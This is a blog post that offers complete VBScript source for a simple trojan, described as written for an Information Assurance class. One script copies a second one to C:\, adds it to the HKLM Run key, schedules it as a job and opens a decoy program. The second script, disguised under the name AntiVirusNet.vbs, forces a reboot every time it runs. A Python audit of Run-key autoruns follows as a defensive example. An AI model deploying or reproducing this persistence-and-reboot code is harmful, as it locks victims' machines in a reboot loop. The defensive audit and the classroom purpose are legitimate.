Windows Scripting BLOG

Due to the limited time available for this project, this blog is not intended for people who are new to scripting, but rather for those who are already familiar with VBS/WMI syntax.

Saturday, 22 December 2007

Example of a simple Trojan I've created for an Information Assurance class

' IMPORTANT! Do NOT use this script on your computer or it could easily damage your system.
' Also, this script has been written to demonstrate the concept of trojan horses/viruses - it should
' NOT be used in a malicious fashion but only for educational purposes on isolated systems.

'File 1 Romcs.vbs

HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."

' Copy the second script (File 2) to the root of C:
Set WSHShell = CreateObject("Scripting.FilesystemObject")
WSHShell.CopyFile "AntiVirusNet.vbs", "C:\AntiVirusNet.vbs"

' Register the copied script under the HKLM Run key so it starts at every logon
Set ObjRegistry = GetObject("winmgmts:{impersonationLevel = impersonate}!\\" & _
    strComputer & "\root\default:StdRegProv")
Return = objRegistry.setStringValue(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run","WRSPXPBXUpd","C:\AntiVirusNet.vbs" )
If Return <> 0 Then
    ' Writing to HKLM failed: the user has no administrative rights
    msgbox("Keine Admin Rights!")
Else
    ' Read the current local time and zero-pad hour and minute
    Set objWMIService1 = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colComputers3 = objWMIService1.ExecQuery _
        ("Select * from Win32_LocalTime")
    For Each objComputer2 in colComputers3
        Hou = objComputer2.Hour
        Min = objComputer2.Minute
        if Hou < 10 then
            Hou = 0 & objComputer2.Hour
        end if
    next
    if Min < 10 then
        Min = 0 & objComputer2.Minute
    end if

    ' Create a Win32_ScheduledJob entry that runs the copied script
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colComputers2 = objWMIService.Get("Win32_ScheduledJob")
    T = "C:\AntiVirusNet.vbs"
    D = "********" & Hou & "" & Min & "00.000000+000" '+1 hour automatically
    erret = colComputers2.Create(T,D,JobID1000)

    ' Start the decoy program the user expects to see
    Set WSHShell1 = CreateObject("WScript.Shell")
    WSHShell1.Run "bowling.exe"
    'WSHShell.DeleteFile ("*.vsbs")
End IF

' File 2 AntiVirusNet.vbs

On error resume next
strComputer = "."

' Request the shutdown privilege and reboot the machine each time the script runs
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colComputers2 = objWMIService.ExecQuery _
    ("Select * from Win32_OperatingSystem")
For Each objComputer2 in colComputers2
    objComputer2.Security_.privileges.AddAsString "SeShutdownPrivilege", true
    errRet = objComputer2.Reboot()
next
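
The Run-key entry that Romcs.vbs writes above is the easiest artifact for a defender to find. The following Python is an added example, not part of the original post: it audits the text of a `reg export` of the Run key for script-based autoruns. It assumes the export has already been decoded to a string; the sample export, the "ExampleApp" and "Updater" entries and the heuristics are constructed for illustration.

```python
import re

# Constructed sample: text of a `reg export` of the HKLM Run key, including the
# value this page's Romcs.vbs writes (WRSPXPBXUpd -> C:\AntiVirusNet.vbs).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ExampleApp"="C:\\Program Files\\Example\\app.exe"
"WRSPXPBXUpd"="C:\\AntiVirusNet.vbs"
"Updater"="wscript.exe //B \"C:\\Users\\Public\\u.js\""
'''

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')  # "name"="string"
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh|hta|bat|cmd|ps1)\b", re.I)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta)(\.exe)?\b", re.I)
ROOT_PATH = re.compile(r'^"?[A-Za-z]:\\[^\\]+$')  # file directly under a drive root

def unescape(s):
    # .reg string values escape backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)

def audit_run_keys(export_text):
    """Return [(key, value_name, command, reasons)] for suspicious autoruns."""
    findings, key = [], None
    for line in export_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            # Only values under a Run/RunOnce key are inspected.
            key = line[1:-1] if RUN_KEY.search(line[1:-1]) else None
            continue
        m = VALUE.match(line) if key else None
        if not m:
            continue
        name, cmd = unescape(m.group(1)), unescape(m.group(2))
        reasons = []
        if SCRIPT_EXT.search(cmd):
            reasons.append("script file autorun")
        if SCRIPT_HOST.search(cmd):
            reasons.append("script host invoked")
        if ROOT_PATH.match(cmd):
            reasons.append("file in drive root")
        if reasons:
            findings.append((key, name, cmd, reasons))
    return findings

if __name__ == "__main__":
    for key, name, cmd, reasons in audit_run_keys(SAMPLE_EXPORT):
        print(f"{key}\\{name} = {cmd}  [{', '.join(reasons)}]")
```

The scheduled job that the script also creates is not covered by this check and has to be reviewed separately.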
